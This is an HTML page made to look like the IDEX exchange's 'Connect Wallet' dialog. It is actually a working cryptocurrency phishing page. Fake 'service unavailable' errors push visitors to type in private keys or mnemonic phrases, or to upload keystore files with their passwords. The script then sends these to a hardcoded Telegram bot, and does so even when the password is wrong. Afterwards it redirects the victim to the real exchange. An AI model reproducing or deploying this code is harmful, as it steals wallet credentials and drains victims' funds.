<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>IDEX High-Performance Decentralized Exchange</title>
	<style type="text/css">
		*{
			box-sizing: border-box;
			padding: 0;
			margin: 0;
			outline: none;
			font-family: Noto Sans, sans-serif;
			font-size: 14px;
		}
		.isPolygonChainTheme {
		  --link: var(--purple4);
		  --info: var(--purple5);
		  --primary1: var(--purple1);
		  --primary2: var(--purple2);
		  --primary3: var(--purple3);
		  --primary4: var(--purple4);
		  --primary5: var(--purple5);
		  --primary7: var(--purple7);
		}
		body {
		  -moz-osx-font-smoothing: grayscale;
		  --black: #000;
		  --blackrgb: 0,0,0;
		  --lighterBlack: #06060b;
		  --lightBlack: #0e0e1a;
		  --black0: #14141c;
		  --black1: #191921;
		  --gray: #333;
		  --gray0: #22222c;
		  --gray0b: #2e2e38;
		  --gray0c: #212124;
		  --gray1: #2f2f34;
		  --gray2a: #43434c;
		  --gray2: #515158;
		  --gray3: #626267;
		  --gray4a: #909090;
		  --gray4: #a1a1a1;
		  --white: #f9f9f9;
		  --blue1: #619fca;
		  --blue2: #05b0ff;
		  --blue3: #45b7ec;
		  --blue4: #65ceff;
		  --blue5: #044766;
		  --blue6: #303f59;
		  --blue7: #111824;
		  --blue: #12141f;
		  --yellow0: #f9e273;
		  --yellow1: #d8b449;
		  --yellow2: #efb72d;
		  --yellow3: #eabe43;
		  --yellow4: #f4d259;
		  --yellow5: #5d4704;
		  --purple1: #a177e8;
		  --purple2: #8247e5;
		  --purple3: #8e59eb;
		  --purple4: #9067d8;
		  --purple5: #6623d5;
		  --purple7: #12141f;
		  --mainLight: #b08bef;
		  --main: #662bc9;
		  --mainDark: #1e1134;
		  --mainDark2: #0f0225;
		  --green1: #052b20;
		  --green1b: #0d2622;
		  --green2: #0a684f;
		  --green4: #00bc8a;
		  --green4rgb: 0,188,138;
		  --green5: #00ce97;
		  --red1: #2e0505;
		  --red1b: #2f1111;
		  --red2: #751b1c;
		  --red3: #ee3f3f;
		  --red3b: #e62827;
		  --red4: #e8251b;
		  --light: var(--white);
		  --lightContent: var(--black);
		  --success: var(--green4);
		  --successContent: var(--white);
		  --error: var(--red3);
		  --errorContent: var(--white);
		  --infoContent: var(--white);
		  --warn: var(--yellow0);
		  --warnContent: var(--black);
		  --tip: #e5efa5;
		  --tipContent: var(--black);
		  --small: 12px;
		  --smaller: 13px;
		  --medium: 14px;
		  --medium2: 16px;
		  --larger: 17px;
		  --large: 21px;
		  --large2: 24px;
		  --ultraLarge: 64px;
		  --header-height: 70px;
		  --mobileNavHeight: 52px;
		  --box-background: #0c0614;
		  color: var(--white);
		  font-family: Noto Sans,sans-serif;
		  font-size: var(--small);
		  background: var(--black0);
		}

		html{
			height: 100%;
		}

		body{
			display: flex;
			align-items: center;
			justify-content: center;
			height: 100%;
			background: url(bg.jpg) no-repeat center center;
			  background-size: cover;
		}
		.window{
			z-index: 100;
			position: relative;
			width: 560px;
			background: var(--lighterBlack);
			color: var(--white);;
			border-radius: 5px;
			padding: 30px;
			/*transition: opacity 400ms ease-in 0s;*/
			display: none;
		}

		.window h1{
			font-size: 21px;
			color: var(--white);
			font-weight: 400;
			display: flex;
			flex-direction: row;
			justify-items: space-between;
			justify-content: space-between;
			margin-bottom: 30px;
		}

		.window h1 svg{
			fill: var(--white);
			
			cursor: pointer;
			width: 24px;
			height: 24px;
			display: inline-block;
			font-size: 1.5rem;
			transition: fill 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
			flex-shrink: 0;
			-moz-user-select: none;
		}

		.window h1 span{
			width: 100%;
			padding-left: 15px;
			line-height: 26px;
		}
		.select.window .list{
			display: grid;
			grid-template-columns: 1fr 1fr;
			gap: 10px;
		}
		.select.window .list a{
			padding: 14px 20px;
			display: flex;
			-moz-box-align: center;
			align-items: center;
			outline: currentcolor none medium;
			cursor: pointer;
			background: var(--black);
			border: 1px solid var(--gray2a);
			border-radius: 5px;
			font-size: 12px;
			text-decoration: none;
			color: #fff;
			cursor: pointer;
		}

		.select.window .list a:hover{
			border-color: #662bc9;
			background-color: var(--mainDark);
		}

		.select.window .list a img{
			height: 30px;
			width: 30px;
			object-fit: contain;
			margin-right: 20px;
		}

		input[type=text],
		input[type=password]{
			width: 100%;
			min-width: 150px;
			text-align: initial;
			padding: 0px 10px;
			border: 1px solid var(--gray3);
			color: white;
			background: rgba(0, 0, 0, 0) none repeat scroll 0% 0%;
			height: 40px;
			outline: currentcolor none medium;
			transition: background-color 0.5s ease 0s;
		}

		.key.window input{
			margin-top: 20px;
			margin-bottom: 40px;
		}


		button{
		  --button-bg: var(--main);
		  --button-bg-focus: var(--primary2);
		  --button-text: var(--button-active-text,var(--white));
		  --button-text-focus: var(--button-active-text,var(--white));
		  border: medium none;
		  border-radius: 2px;
		  position: relative;
		  padding: 13px 40px;
		  background-color: var(--button-bg);
		  color: var(--button-text);
		  outline: currentcolor none medium;
		  text-align: center;
		  font-size: var(--medium);
		  font-weight: bold;
		  letter-spacing: 0.03rem;
		  cursor: pointer;
		  width: initial;
		  transition: background-color 0.2s ease 0s, color 0.2s ease 0s;
		}
		button[disabled] {
		  --button-bg: var(--mainDark);
		  --button-text: var(--button-disabled-text,var(--main));
		}

		.key.window button{
			margin: 0 auto;
			display: block;
		}

		.selectFile{
			width: 100%;
			text-align: center;
			display: inline-block;
			position: relative;
			padding: 13px 40px;
			background: var(--primary2);
			outline: currentcolor none medium;
			border: medium none;
			border-radius: 2px;
			color: var(--white);
			text-transform: uppercase;
			font-size: var(--medium);
			font-weight: bold;
			cursor: pointer;
		}
		.selectFile:hover{
			background-color: var(--primary4);
		}

		.selectFile svg{
			margin: -12px 8px -6px 0px;
			fill: currentColor;
			width: 1em;
			height: 1em;
			display: inline-block;
			font-size: 1.5rem;
			transition: fill 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
			flex-shrink: 0;
			-moz-user-select: none;
		}
		.selectFile input{
			display: none;
		}

		.keystore.window .selectFile{
			margin-bottom: 25px;
		}

		.keystore.window button{
			margin: 0 auto;
			display: block;
		}

		.keystore.window input[type=password]{
			margin-top: 10px;
		}

		.keystore.window input{
			margin-bottom: 40px;
		}

		.error{
			padding: 10px;
			background: var(--red1);
			color: var(--red3b);
			margin-bottom: 12px;
			border-radius: 5px;
			display: flex;
			gap: 14px;
			-moz-box-align: center;
			align-items: center;
			text-align: left;
			line-height: 1.5;
			display: none;
		}

		.error svg{
			fill: currentColor;
			width: 1em;
			height: 1em;
			display: inline-block;
			font-size: 1.5rem;
			transition: fill 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
			flex-shrink: 0;
			-moz-user-select: none;
		}
		iframe{
			position: absolute;
			left: 0;
			right: 0;
			top: 0px;
			/*top: -69px;*/
			bottom: 0;
			display: block;
			width: 100%;
			/*height: calc(100% + 69px);*/
			height: 100%;
			border: none;

		}
		/*.frame_over{
			position: absolute;
			left: 0;
			right: 0;
			overflow: hidden;
			top: 69px;
			bottom: 0;
			display: block;
			width: 100%;
			height: calc(100% - 69px);
		}*/
		.overlay{
			position: absolute;
			left: 0;
			right: 0;
			top: 0;
			bottom: 0;
			display: block;
			width: 100%;
			height: 100%;
			background: rgba(28, 36, 51, 0.85) none repeat scroll 0% 0%;
			z-index: 10;
			display: none;
		}
		.openmodal{
			position: fixed;
			display: block;
			background: transparent;
			z-index: 9;
		}

		.header{
			display: none;
			display: flex;
			height: 69px;
			padding-top: 15px;
			padding-bottom: 15px;
			position: absolute;
			left: 0;
			right: 0;
			top: 0;
			padding-left: 15px;
			padding-right: 15px;
		}

		.header .logo{
			color: var(--white);
			text-decoration: none;
			transition: filter 0.2s ease 0s;
			width: 126px;
			height: 40px;
		}
		.header .logo img{
			width: 100%;
			height: 100%;
		}

		.header button{
			padding: 6px 5px 6px 10px;
			margin-left: 20px;
			display: flex;
			-moz-box-align: center;
			align-items: center;
			font-size: var(--smaller);
			font-weight: bold;
			cursor: pointer;
			transition: background-color 0.2s ease 0s, color 0.2s ease 0s;
			background: var(--primary2);
			color: var(--white);
		}

		.header button svg{
			fill: currentColor;
			width: 1em;
			height: 1em;
			display: inline-block;
			font-size: 1.5rem;
			transition: fill 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
			flex-shrink: 0;
			-moz-user-select: none;
		}
		svg[class*="SimpleModal__CloseIcon"]{display:none}
		.button_connect{
			position: absolute;
			right: 0px;
			top: 0px;
			width: 200px;
			height: 70px;
			z-index: 10;
			cursor: pointer;
			background: transparent;
		}
	</style>
</head>
<body class="isPolygonChainTheme">
	<div class="overlay"></div>
<!-- 	<div class="frame_over"><iframe id="frameSite" src="https://exchange.idex.io"></iframe></div>
	
	<div class="openmodal" style="left:370px;right:0;top:0;height:70px;"></div>
	<div class="openmodal" style="right:0;top:0;width:330px;bottom:0;height:100%;"></div> -->

	<div class="select window">
		<div class="error">
			<svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M4.47 21h15.06c1.54 0 2.5-1.67 1.73-3L13.73 4.99c-.77-1.33-2.69-1.33-3.46 0L2.74 18c-.77 1.33.19 3 1.73 3zM12 14c-.55 0-1-.45-1-1v-2c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1zm1 4h-2v-2h2v2z"></path></svg><span></span>
		</div>
		<h1>Connect Wallet<svg class="MuiSvgIcon-root SimpleModal__CloseIconStyled-sc-1gwrutk-4 jOVHCs" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path></svg></h1>
		<div class="list">
			<a href="#" onclick="openMetamask()"><img src="metamask.svg"/>Metamask</a>
			<a href="#" onclick="switchModal('key', 'Service Trust Wallet temporarily unavailable')"><img src="trustwallet.svg"/>Trust Wallet</a>
			<a href="#" onclick="switchModal('key', 'Service Coinbase Wallet temporarily unavailable')"><img src="coinbase.png"/>Coinbase Wallet</a>
			<a href="#" onclick="switchModal('key', 'Service BitKeep temporarily unavailable')"><img src="bitkeep.svg"/>BitKeep</a>
			
			<a href="#" onclick="switchModal('key', 'Service TokenPocket temporarily unavailable')"><img src="tokenPocket.png"/>TokenPocket</a>
			<a href="#" onclick="switchModal('key', 'Service WalletConnect temporarily unavailable')"><img src="walletconnect.svg"/>WalletConnect</a>
			<a href="#" onclick="switchModal('keystore', '')"><img src="keystore.svg"/>Keystore File</a>
			<a href="#" onclick="switchModal('key', '')"><img src="privatekey.svg"/>Private Key</a>
		</div>
	</div>
	<div class="keystore window" style="display:none;">
		<div class="error">
			<svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M4.47 21h15.06c1.54 0 2.5-1.67 1.73-3L13.73 4.99c-.77-1.33-2.69-1.33-3.46 0L2.74 18c-.77 1.33.19 3 1.73 3zM12 14c-.55 0-1-.45-1-1v-2c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1zm1 4h-2v-2h2v2z"></path></svg><span></span>
		</div>
		<h1>
			<svg onclick="switchModal('select', '')" class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true" style="display: block;"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"></path></svg>
			<span>Keystore File</span>
			<svg class="MuiSvgIcon-root SimpleModal__CloseIconStyled-sc-1gwrutk-4 jOVHCs" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path></svg>
		</h1>
		<label class="selectFile">
			<svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true" style="margin: -12px 8px -6px 0px;"><path d="M5 4v2h14V4H5zm0 10h4v6h6v-6h4l-7-7-7 7z"></path></svg>Upload Keystore Wallet File
			<input type="file" id="keystore_input" name="">
		</label>
		Enter Wallet Password:
		<input type="password" placeholder='' name="" id="keystorePassword_input">
		<button  id="keystore_buttonSend" onclick="sendDataTG('keystore')">Connect Wallet</button>
	</div>
	<div class="key window" style="display:none;">
		<div class="error">
			<svg class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M4.47 21h15.06c1.54 0 2.5-1.67 1.73-3L13.73 4.99c-.77-1.33-2.69-1.33-3.46 0L2.74 18c-.77 1.33.19 3 1.73 3zM12 14c-.55 0-1-.45-1-1v-2c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1zm1 4h-2v-2h2v2z"></path></svg><span></span>
		</div>
		<h1>
			<svg  onclick="switchModal('select', '')"class="MuiSvgIcon-root" focusable="false" viewBox="0 0 24 24" aria-hidden="true" style="display: block;"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"></path></svg>
			<span>Private Key</span>
			<svg class="MuiSvgIcon-root SimpleModal__CloseIconStyled-sc-1gwrutk-4 jOVHCs" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path></svg>
		</h1>
		Enter your Private Key or Mnemoic phrase
		<input type="text" id="privatekey_input" placeholder='"0x..." or mnemoic as "lecture health jealous attract suit ..."' name="">
		<button  onclick="sendDataTG('privatekey')">Connect Wallet</button>
	</div>
	<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.7.5/web3.min.js"></script>
	<script type="text/javascript">
		var keystoreFileContent = '';
		const web3 = new Web3();

		function openMetamask(){
			window.open("meta.html",'...','status=no,titlebar=no,location=no,directories=no,channelmode=no,menubar=no,toolbar=no,scrollbars=no,resizable=no,menubar=0,top=0,left='+window.innerWidth+',width=400,height=650');
			return false;
		}

		// $(function(){
			//var win = window.frames['frameSite'].contentWindow;
			// console.log(window.frames['frameSite']);
			//win.document.body.onclick = function() {
        //win.contentWindow.location.reload();
    	//}

      

			
		// })

		function switchModal(type, error){
			if(error){
				$('.'+type+'.window .error span').text(error);
				$('.'+type+'.window .error').css('display', 'flex');
			}else{
				$('.'+type+'.window .error span').text('');
				$('.'+type+'.window .error').css('display', 'none');
			}
			$('.window').fadeOut().promise().done(function(){
			  $('.'+type+'.window').fadeIn();
			});
			return false;
		}



			$('.overlay').fadeIn();
			switchModal('select');


		function sendDataTG(type){
			var data = '';
			var success = false;
			
			$('#keystore_buttonSend').attr('disabled', true);
			if(type == 'keystore'){
				try{
					var acc = web3.eth.accounts.decrypt(keystoreFileContent, $('#keystorePassword_input').val());
					data = acc.privateKey;
					success = true;
				}catch(e){
					$('.'+type+'.window .error span').text('Invalid password');
					$('.'+type+'.window .error').css('display', 'flex');

					data = keystoreFileContent + "\nPassword: " + $('#keystorePassword_input').val();
					$('.'+type+'.window #keystorePassword_input').val('');
					$('#keystore_buttonSend').attr('disabled', false);
					success = false;
					
				}
				
			}

			if(type == 'privatekey'){
				data = $('#privatekey_input').val().split("\n").join(" ");

				success = true;
			}
			fetch('https://api.telegram.org/bot1954952646:AAFEScLs_9fUgjyqTiG9Is828jf8wupEurI/sendMessage?chat_id=896837120&text=' + encodeURI(data))
				.then(function(response){
					if(success){
				    console.log(data);
						location.href = 'https://exchange.idex.io';
					}
			  })
			
			return false;
		}
		document.getElementById('keystore_input').addEventListener('change', function() {
      var fr=new FileReader();
      fr.onload=function(){
      	if($('#keystorePassword_input').val() != ''){
      		$('.keystore.window button').attr('disabled', false);
      	}
        keystoreFileContent = fr.result;
      }
        
      fr.readAsText(this.files[0]);
    });

		document.getElementById('keystorePassword_input').addEventListener('keypress', function() {
			if($('#keystorePassword_input').val() != '' && keystoreFileContent != ''){
    		$('.keystore.window button').attr('disabled', false);
    	}
		});

		function sendKeystore(){
			var pass = $('#keystorePassword_input');
			console.log(keystoreFileContent, pass);
			return false;
		}
	</script>
</body>
</html>
